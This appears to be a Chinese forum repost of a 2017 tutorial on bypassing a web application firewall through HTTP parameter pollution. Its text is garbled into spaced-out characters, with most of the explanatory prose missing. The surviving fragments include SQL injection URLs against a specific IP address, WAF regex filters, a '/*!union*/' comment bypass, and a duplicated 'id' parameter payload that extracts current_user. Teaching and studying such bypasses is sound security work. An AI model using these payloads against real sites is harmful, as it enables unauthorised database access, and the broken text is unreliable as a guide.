[20873] 2017-08-24_通过HTTP参数污染绕过WAF拦截

文档创建者:s7ckTeam
浏览次数:8
最后更新:2025-01-18
2017-08-24_通过HTTP参数污染绕过WAF拦截 H T T P W A F L e m o n S e c   2 0 1 7 - 0 8 - 2 4 M y S Q L M y S Q L   S Q L   E r r o r   M e s s a g e S Q L h t t p : / / 1 2 8 . 2 3 8 . 6 6 . 2 1 7 / h o r s e . p h p ? i d = 7   o r   1   I N   ( s e l e c t   c u r r e n t _ u s e r ) S Q L i   f i l t e r W A F s e l e c t u n i o n S Q L S Q L W A F 使 / ^ . * s e l e c t . * $ /   o r   / ^ . * u n i o n . * $ / S Q L b l a b l a S E L E C T b l a b l a / * ! u n i o n * / W A F H T T P 使 W A F G E T i d , ? i d = v a l u e 1 & a m p ; i d = v a l u e 2 使 ( P H P , J a v a , A S P . N E T , e t c ) A p a c h e / P H P W A F :   i d = 7 & i d = [ S Q L i ] W A F   i d = 7   < - P H P   i d = [ S Q L i ]   < - 西 A S P . N E T W A F
S Q L 9 1 r i . o r g   / h o r s e . p h p ? i d = 0 & a m p ; i d = 7 % 2 0 u n i o n % 2 0 s e l e c t % 2 0 1 , 2 , 3 , c u r r e n t _ u s e r W A F c s a w _ c h a l 1 @ l o c a l h o s t M y S Q L
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则